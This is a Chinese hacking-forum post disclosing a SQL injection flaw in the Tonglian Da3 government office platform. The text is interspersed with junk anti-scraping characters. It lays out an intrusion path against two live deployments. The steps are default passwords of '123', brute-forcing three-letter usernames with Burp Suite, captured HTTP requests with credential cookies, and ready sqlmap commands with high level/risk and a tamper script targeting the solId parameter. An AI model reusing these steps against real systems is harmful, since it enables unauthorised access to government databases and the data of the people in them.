找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1546|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

* Y; E* k# P; [. B: X: l
- u7 C0 U$ }/ g5 |) d

9 C5 H |; g, V" F

I' O2 ^( ^3 t7 X5 U3 N 平台简介:$ N7 v5 z. ?) v2 a$ e

0 F; h }- c6 Y; r, ]

; H0 ^& I( S, o* j& [  % I' w7 R( l9 m. [: V* S! ?

" [& @/ S' ^( X2 A: b

! H! A0 q6 ]. p8 L. k- T. T 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
" ~7 D% J, _0 Y! D 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
' C1 {3 R. J% P3 X同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! ' r) b- m; x; I7 X1 o% Y

/ z8 Z( `1 n8 z- E- O1 o! T, g

- Q& t( f6 E8 ]& i4 D  8 C0 E; O, z2 g' z& s: _

9 D8 e) Z# S7 W! _, U. k$ `

: |$ D0 D. j6 a" h$ Y 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:9 O8 z9 i& n0 m( L* r

; I. s. {3 p6 B/ X1 \2 K' e

" w3 H* A; Y0 X0 {- M   7 Y. O8 c# t3 h, D

6 B5 D0 w7 ~& }& B2 _9 z

$ `5 T/ b$ I- A0 }9 z) C http://1.1.1.1:7197/cap-aco/#(案例2-) 1 i( A4 |) z2 b0 b( _: F

3 A8 i, r/ ^- u! H: u

+ q |6 D0 a6 F% s) y: v http://www.XXOO.com (案例1-官网网站)% v& C3 ^; Q7 ~( ^" t' J1 H+ r

9 x& o5 X) P9 r/ t! M! E/ d+ r8 s: u

2 z; k# x' j4 l1 ], C; }( J   7 O2 @- U7 I" T- ^& K

+ C4 ~7 C* ~* g0 p7 K1 w) x) A

# l# @4 k' i6 ^" A, u/ N0 t 漏洞详情:+ {$ }6 C4 ~/ O1 X" g9 a% y6 W

4 O9 y% w5 L/ s6 T! K5 r0 }: W! k

9 |+ k# g1 U4 m7 G% K. Q1 X  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试) ?( C7 ~3 u! a$ x$ @# j/ a

' W0 K# V6 f" A

9 ]/ ?+ W+ g. c# K: M! a0 j      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: & D7 z6 S# g: `# W) G% F; e

3 r% I5 t+ z+ t" l; j9 s

, k' d2 K9 O3 S4 p/ h( Y- V0 F" ]  ! {. K$ S) B* b5 ^, m

( d5 _' c0 v% P

6 I8 r4 X$ F0 T' X$ \* }   7 Q; R6 O* Y6 b, F0 n; { q

+ \2 ?) A1 H0 M5 e

* p& z% O8 T! N! L. A4 I% C status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: , T& d2 ?5 A% O; t, r- |& P8 `

% f, H* _$ m1 C0 G7 o4 k/ m

" ~3 }' {2 F% |) |2 @ 1、案例1-官方网站 ' l a: F/ b: M2 K- q+ Q8 n! B" e) L

1 F# I4 u# ^8 ]- Z% B" r; ^

5 {( L) l. P3 K GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.19 Z M9 Z- f% I0 n

' {8 O1 X; x5 s! y+ U; t- [* Z

: f, r% c3 R# a4 k/ E7 O. Z Host: www.XXOO.com( e, I5 P9 H" P4 O- ?; j) ~: _

! z% o5 G# p8 f

+ h w$ X1 i$ D9 b4 W* U! c Proxy-Connection: Keep-Alive# m# M! R. p; i. U! I1 X6 G

0 s# q5 | E( B5 S! I" u

4 p; c# Q* T+ I4 t3 l! Y- j Accept: application/json, text/javascript, */*; q=0.019 k4 N3 J; u" J

1 f' u( f3 @! b" s

% d( x8 r9 a8 K( O( [0 _ Accept-Language: zh-CN1 u/ s, x' [, z- K4 {

4 s q% K9 W" M6 d6 Y& z1 O% w

' q2 H# n. C; I2 t8 e* D Content-Type: application/json, n7 F- v* ~2 r! y1 q

3 ^) `' {) d! ~5 M g3 S

2 _5 Y# \5 c; v- t User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko2 q* T& [) {$ \" t) R# q. {

2 o8 C* v' e3 T' I1 T7 Y& w

( t [4 h4 p! t, ]* ?/ a9 v0 i X-Requested-With: XMLHttpRequest# @0 B6 L" |) Q

8 d8 P0 R9 Z2 G2 a

6 y* O# ]( ]: T) ]; {5 Y$ i5 n Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 ; Y. ^% \# y$ t( J8 m( N

0 h K, `' A' p( f/ m0 `7 P1 m

% v, H% l% Z: Q Accept-Encoding: gzip, deflate, sdch V5 P1 y7 ]4 l

7 P0 m) [0 ^% b( X& U2 d2 T' i

3 _' K9 `! b$ m3 h% y3 r. I1 [" Z. ] Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e & {" n( L: m2 l0 S7 _4 _+ x7 N

/ A" h+ z* i/ V) [

! i4 O# Y2 M4 s! E) J$ z* ~. ?) M 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:% E2 I* N; N8 u! `

5 O6 A" D8 u( Q n- A

1 O# ]. y& W7 C9 x ?: n$ B2 N  ( C* E9 N* ^$ N

N7 W4 s6 g; F* E2 U) F

s b! Q" c; O: m" M( e  1 k) |: c: {* O, T( j

3 E6 A! M! R$ P, U8 a D

" d( }9 z( @$ @   : j9 U" A: W; z7 w' p/ I2 e

3 q2 v! ^6 ]- K4 h3 F

w( v" h' {1 l" m7 m   " F( s$ C" a# f! i

7 b( k; ]4 j, S5 c! r! }( w

7 A8 i0 z% w7 }4 B5 g/ _+ r   6 N o8 \6 f9 K: ?' }1 p1 w

5 o- Z! i0 X& o' L4 P& v

2 M1 f: Z8 _9 u 2、案例2-某天河云平台 $ R( y& |- O9 Z, {7 P# }/ s

8 X* U, S' [9 {6 _" p1 M7 }1 X

4 ^9 P8 _* T& |. d, ^. c GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 # k0 r8 \$ M/ o+ ^+ |# A% L8 M

( F- [' e6 i2 m$ A H

5 f# N3 u* A' s2 u6 s Host: 1.1.1.:7197 $ `( M/ L' N+ i" c

; @% z4 o* l1 n) W; R4 J9 |

! U) S' Y* H# z( r7 N- ~( m Accept: application/json, text/javascript, */*; q=0.01 . g% K2 h- [6 E# i/ M4 a$ U8 u

) {9 Z% P6 v4 E0 G& b

, x- u/ P d# @ X-Requested-With: XMLHttpRequest ) G8 N9 o2 H5 S) W' S8 a

; N- O6 f/ k, M# E( ?8 l% y

3 y/ H' M1 k8 i3 G" N4 w z User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0: ]& W! `) o7 _) n1 l

4 n0 O- t( Z. G4 ~% M

' `) A9 ?! _# J+ N$ H% ^ Content-Type: application/json( g. [6 z3 ]) A0 v

; y1 n) G' g, z! I6 B

+ Y0 M1 i' C/ T, |- P% `% D Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008: ?! {. I* P1 Y+ l+ }+ s

, j. ]2 H) B, F+ S9 B4 O5 m7 Q; S

) p( ~- R% c; m/ h: j6 a8 _5 O Accept-Language: zh-CN,zh;q=0.88 A8 T' ~5 h2 @+ u& s8 M

' C" i9 A9 M+ [& r( V2 h! |

: m4 i2 }; r8 e( h, d Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 % R+ G% ^2 {4 E5 L

5 u; G4 H3 ^8 F

1 ~1 y/ J5 k# f1 b3 W/ ? Connection: close $ C/ @ W# k$ z% c7 h

8 _/ s4 l& Q& z( v: p0 {6 F4 `1 g

( C: D. Z. Q0 C' P 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:" |) g# S$ {& C/ C* }( s

s8 z9 Y, y4 g8 |6 b3 n9 O

) M2 I3 U2 f1 l: q S$ `7 G7 C& Z   4 W& M; D1 S7 Q% [: Y# H0 Q

8 C6 D9 ~# p1 O @

6 f S! L' d* Q G2 } ]! O% i( n5 o
c# l9 w0 V5 [' [! R, n

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表